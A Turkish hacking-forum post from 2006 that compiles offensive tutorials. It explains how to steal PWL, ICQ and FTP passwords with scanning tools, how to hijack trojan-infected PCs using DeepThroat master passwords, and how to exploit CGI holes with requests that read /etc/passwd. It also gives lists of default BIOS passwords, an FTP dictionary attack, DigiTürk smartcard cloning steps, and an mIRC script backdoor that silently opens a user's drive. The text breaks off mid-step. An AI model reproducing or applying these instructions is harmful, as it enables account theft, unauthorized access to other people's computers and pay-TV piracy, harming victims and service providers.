|
|||||||
| E-Posta Çökertme E-Posta adresi çökertmek yada hesap ele geçirmekle ilgili her konuda bilgi bulabilirsiniz yada bildiklerinizi diğer üyelerle paylaşabilirsiniz. |
 |
|
|
Konu Araçları |
16.02.2006
|
#1 (permalink) |
|
[b]ultrAslan[/b]
Katılma Tarihi: Şub 2006
Nereden: bursa
Mesajlar: 265
|
Hallet Gibi Süper Programlar
HALLET GİBİ SÜPER PROGRAMLAR VASITASIYLA PWL
ICQ VE FTP ŞİFRELERİNİ ELE GEÇİRME GEREKLİ PROGRAMLAR: HALLET PROGRAMI PWL TOOL PROGRAMI ICQCRACK PROGRAMI Evet arkadaşlar daha önce manuel olarak pwl ve ıcq şifrelerinin nasıl ele geçirileceğini anlatmıştık. Manuel yöntemle öğrenmek çok önemliydi. Çünkü hack olayında ezbere iş yapmak pek iyi değildir olayın mantığını kavramak önemli. PROGRAMLARI NASIL KULLANIRIZ. HALLET PROGRAMI: Öncelikle ayarlar bölümünde kaynak paylaşım c olarak kalacak hedef dizin pwl dosyalarının bilgisayarımıza kopyalanacağı adres örnek c dizininde klasör oluşturalım ve adını pwller koyalım. HEDEF DİZİN: c:\pwller olacaktır. bu porgramın dosya gönderdiğini ben görmedim sanırım o bölümünde sorun var ama genede yazmak isterseniz göndermek istediğiniz bir dosya ismi yazabilirsiniz veya aynen kalabilir ayarlarımızı yaptık TARAYICI MODUNA GELİYORUZ VE BİR İP ARALIĞI YAZIYORUZ ÇOK BÜYÜK ARALIKLAR VERMEYİN BİLGİSAYARI KİLİTLEYEBİLİYOR EN FAZLA 15 İP ARALIĞINDA KALSIN PORT KISMINI 1243 YAZABİLECEĞİMİZ GİBİ 139 DA YAZABİLİRİZ. YAPILACAK İŞLEMLER BÖLÜMÜNDE HEPSİNİ İŞARETLİYORUZ VE İŞLEMİ BAŞLATA BASIYORUZ çok kısa bir zaman dilimi içinde share kullanıma açık bilgisayarlardan bir sürü pwl ıcq nadirde olsa ftp şifrelerini tespit ediyor ve belirlediğimiz klasöre kaydediyor. HALLET: Hallet Programı için Rx3 programı vasıtasıylo eğer programınız elinizde yoksa indir: download bölümünde . Belirli bir aralığı taratarak share bilgisayarları tespit ediyoruz ve hallet programınının ip bölümüne giriyoruz. keylogger göndermek isteniyorsa keylogger göndere basıyoruz keylogger gönderiyor keyloger txt indir dediğimiz zaman gönderdiğimiz keyloggerleri okuyor yanlız karşı pcnin yazmaya ve silmeye karşı güvenliği olmaması gerekir.Hallet programının en önemli özelliklerinden biri dizin görüntüleyle karşı pcye seri bir biçimde dalması yani bilgisayara girer. PWL İNDİR: Çok kısa bir zaman içinde bütün pwl leri bulur ve ve kendi klasörüne ip numaralarına göre kopyalar halletin bu özelliği mükemmel. Bulamazsa sesli mesaj verir bulurken daha değişik sesli mesaj verir FTP indir:karşı pcde varsa ftp şifserelerini bulur ve kopyalar. İKİ ADET MÜTHİŞ PROGRAM ŞİFRELERİ PROGRAMLAR KAYDETTİ NASIL AÇACAĞIZ pwl şifrelerinin üzerine iki kez tıklarsak pwl tool programı hemen önümüze geliyor searchPasswordFast butonuna basıyoruz hoop bütün şifreler önümüzde. Bu kadar basit. PEKİ ICQ ŞİFRELERİNİ NASI AÇACAĞIZ ICQcrack porogramını açıyoruz.En soldaki buton openICQ dadabase ye basıyoruz ıcg şifrelirini c:\pwl ler dosyasına kaydetmiştik hemen c yi arattırıp o dosyayı buluyoruz karşımıza open file geldi open feledeki ICQ numarasının üzerine tıklıyoruz aç diyoruz hooppppp ICQ ŞİFRESİ HATTA VE HATTA KULLANDIĞI VERSİYONU KARŞIMIZDA evet arkadaşlar bu programlar vasıtasıyla dial up ve ıcq şifre elde etmek çok kolay ve kısa bir zaman içinde yüzlerce pwl ve ıcq şifreleri elde edebilirsiniz. KOLAY GELSİN SUPER SCAN PROGRAMI KULLANIMI SUPERSCAN İNDİR download bölümünde Hostname Lakup:Buraya hangi ip aralığını taramak istiyorsak sadece bir tane ip numarası giriyoruz. Lakup a tıklıyoruz bilgisayarın hostu bağlantı adresi çıkıyor yazdığımız ip o an nette değilse herhangi bir şey yazmıyor. 1-255 ip aralığı tarattırmak istiyorsak.ip kısmının altında 1..254 butonuna tıklıyoruz. diyelimki aynı anda schoolbus-Sub7-Netbus pro trojanlarını taratmak istiyoruz. Port List Setup butonuna basıyoruz Port List File kısmından trojanı seçiyoruz.Evet trojan listesi önümüze geldi ve birçok sayıda trojan ama biz bunların hepsini taratmak istemiyoruz hepsini taratmaya kalkarsak çok zaman alır. Clear All butonuna basıyoruz trojanların yanındaki işaretlerin hepsi kalktı Schoolbusu taratmak için 54321 portu sub7 için 27374 ü Netbus pro için 20034 ü işaretliyoruz ben üç tane trojan seçtim siz sadece Schoolbusu veya subu veya istediğinizi seçebilirsiniz.Seçtikten sonra OK butonuna basıyoruz evet hayır geliyor hayırı işaretliyoruz.Tekrar ana sayfaya döndük.Starta basıyoruz. O ip aralığını seri bir biçimde tarıyor Active host kısmı o ip aralığında aktif nete bağlı durumdaki pclerin sayısını gösteriyor Open ports ise bize gerekli olan kısım yani aradığımız torojanların o ip aralığında kaç adet olduğunu gösteriyor.Yanlarında artı olanlar trojanlı pc ler. artılara teker teker basabileceğimiz gibi scan işleminin bittiken sonra da tıklayabilirir. Hiç tavsiye etmem Scan işleminin bitmesini bekleyin ip arama bitince diyelimki 195.175.101.1 / 195.175.249.255 gibi büyük bir ip aralığı tarattınız önünüze tahminimce en az 5000 civarı aktif pc çıkacak yani tahminen 5000 civarında aktif pc içinde trojan arayacak bulabileceği trojan sayısı o andaki duruma göre 20 olur 5 olur hiç olmaz 30 olur her neyse tarama bittikten sonra Expand all butonuna basıyoruz yanında + işaretli yani aradığımız trojanlı pcler açılıyor. Daha sonra Prune butonuna basıyoruz ekranda sadece aradığımız trojanlar kalıyor diğer binlerce işimize yaramayan pc listesi kayboluyor ve trojanlı ipleri teker teker clinte giriyoruz.Sadece 1-255 aralığı taratacaksak yukarıya her seferinde ip numarası yazmaya hiç gerek yok PrevC Geriye doğru 1-255 aralık arama NextC ileriye doğru 1-255 ip aralığı tarama bu butonlara basmanız yeterli. Eğer çok büyük ip aralığı tarayacaksak Starta başlangıç ip no elle giriyoruz.Stop a bitiş ip no yine elle giriyoruz. Çok kısa bir zaman dilimi içinde kaç tane trojan bulmak isterseniz binlerce pc yi tarayarak önümüze getiriyor. Evet en kullanışlı en seri şu anda emsali olmayan ücretsiz Super Scan ın sadece trojan bölümü için anlatılması gereken kısmı bu. All ports from la tüm açık portları taratabilirsiniz. Tüm açık portları çok kısa zamanda bulur telnetten bağlanır.Daha birçok özelliği mevcuttur. Bizim için gerekli olan kısımlarını dilim döndüğünce BiOS Şifreleri ve BiOS Şifresi Kırmak : BIOS Şifrelerini konusunu biraz araştıracak olursak.. bilmeyenler için Kırılması en zor şifrelerden biridir.. Öncelikle bilmeyenler için söyleyim BIOS Password bilgisayarınız henüz açılma aşamasındayken karşınıza çıkan şifredir. Peki bundan nasıl kurtulacaksınız. Çok kolay.. ama gizli bir iş için yapacaksanız mesela hırsızlık falan.. zaman alacaktır.. önce kasayı açmanız gerekecek daha sonra BIOS pilini kasadan 5dk lığına çekin.. bilgisayarı 5dk sonra çalıştırdığınızda BIOS şifresi sormayacaktır. Yada bazı Boardların BIOSlarındaki özel Jumperlardan yararlanabilirsiniz. Ancak bazende BIOS passwordların Board`un ilk kullanıldığı gibi kalır.. Bilgisayar sahibi şifreyi bildiği için değiştirmez yada değiştirmeyi bilmediği için denemez.. Peki bunların şifreleri nelerdir. Bu şifreler BIOSun türüne göre değişir ben bazılarını en sık üretilenler sırasına göre verim AWARD BIOS alfaromeo AW AWARD AWARD_PS AWARD_PW AWARD_HW AWARD_SW AWARD PW AWARD SW _award awkward j64 j256 j262 j322 01322222 589589 589721 HLT SER SKY_FOX Syxz aLLy CONCAT TTPTHA aPAf HLT KDD ZBAAACA ZAAADA ZJAAADC djonet AMI BIOS: AMI ami bios setup cmos AMIDECODE A.M.I. AMI SW AMI_SW BIOS PASSWORD HEWITT RAND Oder A.M.I. AMI!SW AMI?SW HEWITT RAND alfarome efmukl ( işte schoolbusın şifreside burdan çalınmıştır. ) Phoenix: phoenix Compaq: compaq Tinys: Tiny Bazı Diğer BIOS Şifreleri: LKWPETER lkwpeter BIOSTAR biostar BIOSSTAR biosstar ALFAROME Syxz Wodj PASS PASSOFF CONDO J64 BIOS SETUP CMOS admin system Cgi Açiklarla Site Hacklemek Web sitelerini CGI açýklarýndan faydalanarak kýrmanýn iki yolu vardýr. 1. Yol: Bilindik CGI'larý browser'ýmýzýn adres satýrýna yazarak manuel olarak ararýz. Bilindik CGI ve diðer script açýklarý þöyle: aglimpse > /cgi-bin/aglimpse AnyForm2 > /cgi-bin/AnyForm2 args.bat > /cgi-dos/args.bat AT-admin > /cgi-bin/AT-admin.cgi bnbform.cgi > /cgi-bin/bnbform.cgi campas > /cgi-bin/campas carbo.dll > /carbo.dll CGImail.exe > /scripts/CGImail.exe cgiwrap > /cgi-bin/cgiwrap classifieds.cgi > /cgi-bin/classifieds.cgi Count.cgi > /cgi-bin/Count.cgi displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp edit.pl > /cgi-bin/edit.pl environ.cgi > /cgi-bin/environ.cgi exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm Fax Survey > /cgi-bin/faxsurvey filemail.pl > /cgi-bin/filemail.pl files.pl > /cgi-bin/files.pl Finger > /cgi-bin/finger fpcount.exe > /scripts/fpcount.exe glimpse > /cgi-bin/glimpse guestbook.cgi > /cgi-bin/guestbook.cgi Handler > /cgi-bin/handler howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp HTML Script > /cgi-bin/htmlscript HTIMAGE > cgi-bin/htimage.exe info2www > /cgi-bin/info2www issadmin/bir.htr > /scripts/issadmin/bdir.htr jj > /cgi-bin/jj maillist.pl > /cgi-bin/maillist.pl man.sh > /cgi-bin/man.sh newdsn.exe > /scripts/tools/newdsn.exe nph-publish > /cgi-bin/nph-publish nph-test-cgi > /cgi-bin/nph-test-cgi openfile.cfm > /cfdocs/expelval/openfile.cfm perl.exe > /cgi-bin/perl.exe perlshop.cgi > /cgi-bin/perlshop.cgi PF Display > /cgi-bin/pfdispaly.cgi PHF > /cgi-bin/phf PHP > /cgi-bin/php.cgi rguest.exe > /cgi-bin/rguest.exe search97.vts > /search97.vts sendmail.cfm > /cfdocs/expelval/sendmail.cfm showcode.asp > /msads/Samples/SELECTOR/showcode.asp survey.cgi > /cgi-bin/survey.cgi Test-CGI > /cgi-bin/test-cgi textcounter.pl > /cgi-bin/textcounter.pl THC - Backdoor > /cgi-bin/rwwwshell.pl uploader.exe > /cgi-win/uploader.exe view-source > /cgi-bin/view-source view-source > /cgi-bin/view-source VTI BIN [shtml.dll] > /_vti_bin/shtml.dll VTI BIN [shtml.exe] > /_vti_bin/shtml.exe VTI INF [_vti_inf.html] > /_vti_inf.html VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd VTI PVT [service.pwd] > /_vti_pvt/service.pwd VTI PVT [users.pwd] > /_vti_pvt/users.pwd Web Sendmail > /cgi-bin/websendmail webdist.cgi > /cgi-bin/webdist.cgi WebGais > /cgi-bin/webgais wguest.exe > /cgi-bin/wguest.exe wrap > /cgi-bin/wrap www-sql > /cgi-bin/www-sql wwwboard.pl > /cgi-bin/wwwboard.pl 2. Yol: Manuel olarak aramak yerine iþimizi kolaylaþtýrmak için bir CGI Scanner kullanabiliriz. Not: CGI'larý aradýðýnýz sitede bulursanýz bunu çalýþtýran exploit'i de bulmanýz gerekir. Þimdi diyelim ki iki yoldan birini kullanarak PHF açýðýný bulduk. Bunu þöyle kullanýrýz: http://www.mit.gov.tr/cgi-bin/phf?Qa...%20/etc/passwd yazarýz (adres örnek olarak yazýlmýþtýr. Herhangi bir art niyet yoktur;o)) Tabii çýkan dosya etc içindeki username ve password'lerin olduðu password dosyasý olacaktýr. Þu þekilde: slasher:VTNaA6DjT/9ME:1603:100:,robertmaier@gmx.net,,:/home/slasher:/bin/bash\par mcgreen:ryKOFkUDiGO3A:1604:100:,mail@reinhard-gruene.de,,:/home/mcgreen:/bin/bash\par abi98:cUp.uUzNzr8YY:1605:100:,baileyberni@gmx.de,, :/home/abi98:/bin/bash\par henner_:ziprJNh85rk.o:1606:100:,henner_@web.de,,:/home/henner_:/bin/bash\par Çýkan password'larý bir password cracker ile kýrabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardýmýyla hack etmek istediðimiz sayfada service.pwd varsa ne yapacaðýz? http://www.mit.gov.tr/_vti_pvt/services.pwd yazarýz. Ýþte bir de PHP CGI örneði: http://www.mit.gov.tr/cgi-bin/php.cg.../../etc/passwd Bu örneklere bakarak olayýn mantýðýný biraz da olsa kavrayabilirsiniz. Bug'ý bulduktan sonra exploit'ini bulup veya yazýp çalýþtýrmanýz gerek. Bu da size kalmýþ... Not: Adý geçen dosyalar Files bölümünde. Unsecure Programi ile Site Hack Site kýrmak için öncelikle UnSecuare denilen bir programa ihtiyacýnýz var. Bu programýda Programlar Bölümünden bulabilirsiniz. Programý çalýþtýrýnca karþýnýza gelen yerde neler yapmanýz gerektiðini yazacam þimdi. Computer name or Ip: Buraya Kýrmak istediðiniz sitenin Ip numarasýný yazmalýsýnýz. Bilmiyorsanýz, Cute Ftp ile baðlanýn Ipsini baðlanýrken göreceksiniz. Port: buraya kýrmak istediðiniz sitenin portunu yazýn genellikle 21 oluyor. Siz 21 olarak býrakýn. Current password: Buraya dokunmayým, Username: Bu bölüme sitenin kullanýcý adýný yazýn, bilmiyorsanýz Ip numarasýna finger çekin görürsünüz. Dictionary File: Burasý kilit nokta buraya denenecek olan þifreleri barýndýran dosyanýn adýný yazýn. Bu tür dosyalar oluþturmak için Sibob denilen bir program var. Programlar bölümünde bulabilirsiniz. Attack Options bölümünde yapacaðýnýz deðiþikler: Dictionary attack ve reconnect on disconnect tuþlarýný seçin diðerlerini seçili býrakmayýn. Brute force attack: Bu bölümde hiçbirþeyi seçili býrakmayýn. Diðer kalan bölümlere hiç dokunmayýn ve connect tuþuna basýn þifreleri denemeye baþlar. Biraz uzun sürer ama site kýrmanýn en emin yoludur. Þifreyi bulursa current password bölümünde görürsünüz. DeepThroat v3.1 ile bilgisayara nasil girilir? --------------------------------------------------------------------- DT v3.1 Client.exe programini çalistirdiktan sonra açilan program penceresinin üst tarafindaki ip bölümüne 127.0.0.1 yazin ping butonunu tiklayin. Bu islemi yapmamizdaki amaç server programinin kendi bilgisayarimizda açik olup olmadigini kontrol etmek içindir. Unutmayin her herseyden önce kendinizi güvence altina alin daha sonra baskalarinin bilgisayarlarina girmeye kalkin. Eger bunu umursamazsaniz ava giderken avlanirsiniz. Neyse bu islemi yaptiktan sonra DeepThroat monütöründe serverin açik olup olmadigini görecekseniz. Server açik degilse: Pinging 127.0.0.1 Server açik ise : Pinging 127.0.0.1 127.0.0.1: Ahhhh My Mount Is Open (v3.1) Serverenizin açik oldugunu görürseniz telesa kapilmayin. Hemen Server Conf bölünden Main Config bölüne gelin ve Kill server butonunu tiklayin. Bu islem sonucunda server kaldirilacaktir. Server'in kaldirilip kaldirilmadigini tekrar pingleyerek ögrenebilirsiniz.. Ön bilgi olarak bu güvenlik kontrolünü ögrendikten sonra gelelim baskasinin bilgisayarina nasil girecegiz sorusunun cevabina: Ilk önce kendinize bir servis saglayicisi ip'si bulaniz lazim. Örnegin superonline ip'sini kullanalim. ip numaramiz 212.253.152.52 olsun. Bu ip numarsini Scanner bölümüne ip yerine 212.253.152.52 yaziyoruz. Daha sonra yukaridaki seçeneklerden ortadaki seçenegi seçiyoruz (Class C. e.g. 127.1.*.*). Son olarak Scan Ip Range butonunu tikliyoruz ve bekliyoruz. Eger serverin açik oldugu bir bilgisayara raslanirsa yan tarafta o bilgisayarin ip numarasi yazacaktir. Örnegin: 212.253.100.10 ip numarasini göstersin. Bu ip numarasini alip ana penceredeki ip bölümüne yazip pingliyoruz. Bu islem sonucunda eger server sifreli degilse direkt o bilgisayar baglanacaksiniz. Eger server sifreli ise ekranda Password Required, Please Identify! yazacaktir. Bunu üzerine eger sifreyi bilmiyorsaniz. Yapaniz gereken çok basit. Sifre bölümüne server türüne göre asagidaki master password'lerinden birini yazniz. Bu sifreler genel kirici sifredir. Yani serverin sifresi ne olursa olsun bu sifreyi yazdiginiz zaman server sifresini kirmis olursunuz. DeepThroat'in Masterpasswordlari: v2.1 server için:whothefuckdoyouthinkiamgoddamnit1 v3.* server için:whothefuckdoyouthinkiamgoddamnit3 Secure-v3.1 server için:coldhasquit Server sifresini kirdiktan sonra artik kurbanin bilgisayarini kapilari size açilir ve istediginizi yapabilirsiniz. Son olarak bilgisayarin dosyalarina nasil erisebileceginizden bahsedeyim. Bunun için FTP Client bölümüne girin. Buradan Connect butonunu tiklayin. Karsiniza çikan yeni pencereden Dis/Enable FTP butonunu tiklayin ve sonrada connect butonunu tiklayin. Artik kurbanin bütün dosyalari karsiniza gelecektir. Hadi kolay gelsin. Bu programi en iyi sekilde ögrenmek için internete bagli olmadigniz bir zamnda server programini çalistirin ve kendi kendinizin bilgisayarniza girin. Böylece hangi butonun ne ise yaradigni ögrenmeniz daha rahat olacak. Bu islem sonucunda server'i kaldirmayi unutmayin. Bu arada server.exe'yi çalistirdiginiz zaman kendini C:\Windows\systray.exe olarak kopyalar. Digitürk Hack Meşhuuur digitürk ü nasıl beleş izlersiniz...... açıklama:cw cryptowork anlamına gelir ve digitürk ün kullandığı şifreleme sistemidir::::::::::::::::::::::::: 1. Cw Hakında genel Bilgiler 2. Gereken Malzemeler 3. Original Kartı doğru okutmak 4. DT Kartına yeni Paket eklemek 5. DT Kartından tarihi geçmiş Paketleri silmek 6. INS ve Nanolar 7. Salonlar 8. Log yapmak 9. Cripto2001 INS Bölümü 10. Diğer INS ve Nanolar 1. Cryptoworks hakında genel bilgiler : Öncelikle sunu belirteyim,bu FAQ`ı yazma sebebim kesinlikle yasal Abo yapabileceğiniz bir ülkede adı geçen Provideri ücretsiz seyredebilmeniz için değil.Amacim sadece bir yayın sifreleme systemi olan Cryptoworks systemini ve bir Smartkart ile yapılabilinecek imkanları araştırmak.Kartınıza veya herhangi bir cihazıniza gelecek olan zarardan sorumlu değilim.Cryptoworks yayın şifreleme systemi şu ana kadar tam olarak çözülmüş değil.Yayını açmak için kulanılan bu yöntemler benim kanatıma göre uzun vadeli bir yöntem değil,onun dışında Cryptoworksun Algorytmü halen çözülmüş değil.Signaturun bugünkü programlar tarafından hesaplama yerine „timen“ yapmasınında tek sebebi budur.Üzerine basarak söylüyorum Cw-Algosu bilinmediği veya puplic olmadığı sürece hic bir Goldwafer kartının çalışma ihtimali dahi yok. 2. Gereken Malzemeler: 1. Original DT-Kartı 2. Kartın Bitmap bilgilerini okutmak için CW-Reader veya Winexplorer 4.4 3. Karta elde edilen bilgileri yazabilmek için Cripto2001 4. Phönix Kart Programlayıcısı (MasterCRD,Multiprog v.s) 5. Log için Seasson2-Interface 3. Original Kartı doğru okutmak: Bu işlem için iki ihtimal var.Birincisi ve daha kolay olani ,CW-Reader programinin yardimi ile Karti reactive etmek için tüm gereken bilgilere ulaşmak.Genelde CW-Reader programi kulanildigi için anlatimimi bu Programa göre yapacagim.Ikinci ihtimal ise Winexplorer 4.4 ile Karti tam detaili bir şekilde bir script araciyla okutmak.Bu yöntem konu hakinda daha fazla bilgi edinmek isteyen Arkadaşlar için daha uygun olani.CW-Reader aslinda kendi kendini anlatan bir program,yinede kisa olarak anlatmaya calişayim.CW-Readeri acip Prgrammerinizin PC`ye bagli oldugu COM portunu seçtikten sonra “Read Card“ tusuna basarak kartinizi okutuyorsunuz,eger okumayipta hata veriyorsa „Configuration“ Menüsünden „ResponceDelay“ değerlerini değiştirip tekrar deneyin Kartı hatasız okuyana kadar.Bendeki çalışan ve standart „ResponceDelay“ değeri „150“.Şimdi bize karti açmak için lazim olan bilgiler şunlar: CHID,Status,Version,Baslangıç ve Bitiş tarihi ve Chanel Bitmap. Paketin ismi o kadar önemli bir Nokta değil,buraya kendi adınızı dahi yazabilirsiniz hiç birşey değişmez.Eğer kartınızı başarı ile okutmayı tamamladıysanız diğer işlemlerle devam edelim....... 4. DT Kartına yeni Paket eklemek: Öncelikle aşagida vermiş oldugum DT-Verileri örnek verilerdir,yani şu an çalişmayanlar.Yeni velileri kendiniz temin etmeniz gerekir. Cripto2001 V8 veya daha büyük programını açıp yine COM-Port gibi ayarları yaptıktan sonra kartınızı okutun.Kart`dan okutuğumuz ve başka bir kart`da yazmak için kulanacağımız bilgiler diyelimki sunlar. ProviderID: C0 Status: 20 CHID: 0D EF Version: 00 00 00 71 Baslangic Tarihi : 01.01.2001 Bitis Tarihi : 01.01.2010 Ch Bitmap: 00 00 00 00 00 00 00 00 00 00 00 01 FF FE 00 00 00 00 00 00 0F FF FF FF FF FF FF FF FF FF FF FF Şimdi Cripto2001`in „Kayit“ Bölümünden „Aktiv Et“ seçeneğini seçin, bunu yaptıktan sonra karşınızda aşağıdaki Pencereyi göreceksiniz.Elinizdeki verileri aynen Resimde gördüğünüz gibi programa geçtikten sonra „Yazılacak olan Kanaları seç“ yazan yerden 1. kutucuğu işaretleyin,sonra „Karta Yaz “ tuşuna basarak signaturu aratmaya baslatin.Signatur arama işlemi biter bitmez ACK yazan yerde 90 00 yazmasi gerek ve yeni Packetiniz kartinza geçmiş durumdadir eger yanliş birşey yapmadiysaniz. 5. DT Kartından Tarihi geçmiş Paketleri silmek: Bu sefer „Deaktivate“ bölümüne geciyoruz.bugüne kadar elde edinmiş bilgilere göre Statusu A0 olanlar haric tüm packetler Kartdan tekrar silinebiliyor.Asagidaki örnekte yukaridaki örnek ile ayni olsun diye ben „20“ kulandim.Burda yine iki seçeneginiz var,ya tarihe göre sileçeksiniz yada CHID`ye göre.Eger tarihe göre silmek istiyorsaniz „Paket sil (Tarih üzerinden)“ yazan Bölümü Kulanacaksınız,buraya sadece ProvID ve Tarihi verdikten sonra,vermis oldugunuz tarihden eski olan tüm Paketler silinir.DIKKAT: Silme işi aynı anda değil,yani teker teker siliyor program ve her seferinde Signatur arayacaktır.Ikinci seçeneginiz ,aşağıdaki seçeneği kulanarak Paketi CHID üzerinden silmek,bu daha sağlıklı olan seçenektir bana göre.Buraya`da yine ProvID,Status ve CHID gibi verileri girdikten sonra Signaturu aratmaya baslatıyorsunuz. 6. INS ve Nanolar: Evet şimdi geldik işin en ilgi çeken yanina.Burda şimdi bazi INS + Nanolari ve bunlari nasil kulanacaginizi anlatmaya çalişacagim.Bunun için original Loglardan alinti kulandim. Ne gibi INS`ler var ve INS nedir ? INS yani Instruction bir komut anlamını taşır ve A4`ün hemen yanında gelir à A4 42 00 00 20 42 = INS 20 = Bundan sonraki gelecek olan byte`larin sayısı (Hexdezimal olarak burda 32 Bytes) 1. Smartkartından verileri okuma 2. Smartkartına yeni veri yazma ve silme 3. PIN Kontrolü 4. PIN degistirme 5. ve burda saymadığım daha bir çok INS bulunmaktadır. Şimdi yukaridaki 42`nin yerine gelebilecek bazı Örnekler: Insruktion 42 = Tek bir Kart icin okuma ve yazmak Insruktion 48 = Belirli bir Kart grubunu okuma ve yazmak Insruktion 22 = PIN Kontrol Insruktion 24 = PIN degistir Insruktion 26 = PIN`i Kapat Insruktion 4C = Sormak Insruktion C0 = Cevap almak Insruktion A2 = Aramak Insruktion A4 = File seçmek Insruktion B0 = Binary okumak Insruktion B2 = Bilgi ve Kayıtları okumak Insruktion B8 = ****** numarasını okumak Bir Paket silinirken veya yazılırken genelde ya „42“ yada (eğer birçok Karta yapılacaksa islem) „48“ INS`i kulanılmakta. NANO`lar : Nanolar hakında bilinmesi gerekenler.Her Nano 1 byte`dır,hemen yanındaki ikinci byte`i Nanonun uzunlugunu belirler.Örnek vermek gerekirse söyle: Nano 80 Kartı Hex ****** üzerinden Kontakt eder, Nano 80`den hemen sonra gelen 05 ise Hex serialın uzunlugunu belirler yani burda 5 byte. Asağıdaki saydığım Nanolar sadece kanatıma göre önemli olan Nanolar,saymadıgım bilinen ve Bilinmeyen daha cok Nanolar var olmaktadır. 80 05 à Hex ****** /5 Bytes 80 04 à Hex ****** /4 Bytes (Belirli Kart Grubuna Komut göndermek için) 83 01 à Provider ID/ 1Bytes 8C 03à Status / Chid : 3 Bytes (Burda ilk byte Status sonraki iki byte CHID) 8D 04à Baslangiç Tarih / Bitis Tarih/ (Burda ilk 2 byte Baslangiç ikinci 2 byte Bitiş) 92 20 à Kanal Bitmapı / 32 Bytes DF 08à Signatur / 8 Bytes C5 01à Kulanılan Key indexi /1 Bytes DB10à Providerin resmi cözmesi için Karta gönderdiği 2x 8 Bytes %F Mirc Üzerinden Bilgisayara Girilebilir :: Bugüne kadar remote bir bilgisayara girmek için birsürü yol öğrendiniz. Trojanlar, NetBIOSlar, Ağ tanıtımları, Telnet vs.. vs.. Ama Internetin bukadar yaygınlaşmasında büyük rol oynayan mIRC ile bunu yapabileceğinizin aklınıza geldiğini sanmıyorum.. Şimdi size lafı fazla uzatmadan kısa bir döküman okutacağım.. Öncelikle bu yöntemin çok az kişi tarafından bilindiğini söyleyebilirim.. Bu nedenle işinizi fazla çaktırmadan yapınki.. bu yöntemde diğerleri gibi herkesin eline düşüp telef olmasın.. Bu yöntemle karşı taraftan dosya aktarımı yapabilirsiniz. Ancak dosya silemezsiniz. Fakat bizim işimizede yarayacak olan *.pwl dosyaları. tabi sizin kişisel istekeriniz varsa onlarıda download etmeniz mümkün. Şimdi karşı taraftaki muhabbet ettiğiniz kişiye //fserve nikiniz magtext rootdirectory welcomefile Bu komutta yerine oturan şeyleri yazdırmanız gerekir. Bunları biraz açıklayacak olursam. Nickname: Sizin nickiniz Magtext: Aynı anda kaç dosya çekebileceğinizi belirten bölümdür. Root Directory: Karşı tarafın bilgisayarında erişeceğiniz dizini belirtir. Mesela "C:\WINDOWS\" gibi... Welcome File: Bu son derece gereksiz. Ama böyle bir parametrede var ve bende bunu açıkayim dedim. Buda siz PCye eriştiğiniz zaman sizi karşılayacak text dosyasıdır. Şimdi komutu bir örnekle açıklayalım.. Mesela bilgisayarına girmek istediğimiz kişinin nicki "Yanliz_Ve_Mutlu" olsun bizim nickimizde Virus "Yanliz_Ve_Mutlu" Kullanıcısına şu komutu yazdırmayı başarmanız gerekir. //Fserve Virus 10 C:\WINDOWS\ TRhc.txt Şimdi burda "Yanliz_Ve_Mutlu" Virus nickinin C:\WINDOWS\ dizinine girmesine izin veriyor. Ve dizinden 10 dosya download edebilmesine izin veriyor. Böylece Virus nickine sahip kullanıcının *.PWL dosyalarına erişebilmesinide sağlamış oluyor. Evet buraya kadar kullanıcıya yazdırmanız gereken komutu anlattım.. Şimdide bunu Script yazarları için bir nevi server dosyası haline dönüştürmek için gerekli komutlara bakalım.. Hatırlarsanız eskiden Dragon ve Solucan scriptlerde basit bir "Remote Control" sistemi vardı. Sizde daha gelişmiş birşeyler yazabilirsiniz. ON 1:TEXT:*TurkHackerCenter  {if ($nick == Virus) { /fserve virus 10 C:\ debug.txt | /close -m virus } else HALTDEF } Yukardaki komutta gördüğünüz şeyin açıklaması şudur. Siz Virus nickine sahipsiniz ve sizin scriptinizi kullanan bir kullanıcı var onun bilgisayarına erişmek için ona "TurkHackerCenter" yazısını gönderiyorsunuz. Sonrada o size C:\ dizini için giriş veriyor. Tabi sizin pencerenizi hemen kapatıyor ve şifrenin kullanıcının eline geçmesini engelleiyor. Böylece sizde sadece kendinize özel bir sistemin güvenliğini sağlamış oluyorsunuz. Tabi en en kolay komutu verdim. Bunu geliştirip kişisel uyarlamalarla daha güvenli hale falan getirmenizde mümkün.. Yanlız unutmayınki.. Kurbanın sizin girmenize izin verdiği dizinden daha alt dizinlere geçemezsiniz. Fakat daha yukarılara çıkabilirsiniz. Bunu bir örnekle açıklayacak olursam şöyle anlatabilirim. Mesela Kullanıcı size "/fserve virus 10 C:\WINDOWS\ debug.txt" komutuNU Kullanarak geçiş verdi. Bu komuttan sonra C:\WINDOWS\System32 dizinine geçebilirsiniz. ama C:\ dizinine inemezsiniz. Ayrıca dizin değiştirmek dosyaları download etmek için bazı komutlar var onlarda şöyle.. CD "Directory": Dizin değiştirmenizi sağlayan komut Exit: Çıkış Get "filename": Dosyaları indirmek için kullanılır. (Uzantısıyla birlikte yazılır) Help: Yardım Ls: Dizindeki dosyaları listeler. Bundan sonrası size kalmış dizin değiştirip *.PWL dosyalarını kendi bilgisayarınıza aktarın sonrada PWL Crackerlarla kırın ve istediğiniz şifreyi alın.. Hatta size PWL Şifrelerini çözmek için PWL Toolr programınıda tavsiye edebilirim. Hadi size kolay gelsin..... R3X Kullanımı (Trojansiz Bilgisayara Girmek İçin) Gerekli Olan Programlar DOWNLOD BÖLÜMÜNDE 1-R3x(445 kb) 2-Hallet(257 kb) 3-Icqrin(295 kb) 4-Repwl(168 kb) 1-Simdi ilk basta tüm dosyalari download edelim. 2-Evet simdi R3x'i açalim.Çikan uyariya tamam deyin.Ve scan from yazan yere istedigimiz ip numarasini yazalim to yazan yere ikinci ip yi yazalim (burada iki ip numarasi arasindaki açiklari olan bilgisayari gösterir)bu arada benden size kiyak asagida en çok kullandigim ip araliklarini yazdim.Evet scana basmistik simdi arama bittikten sonra açik bilgisayarlar listelenmistir. 3-Bu arada program 2000 NT ve Linux larda çalismiyor.Evet simdi çikan bilgisayarlardan birinin üstünde sag tiklayin ve gather intelligence yi tiklayin bu islem size bilgisayarin açik olan klasörlerini gösterir.Evet olurda sizden sifre isterse hemen sag tiklayin ve 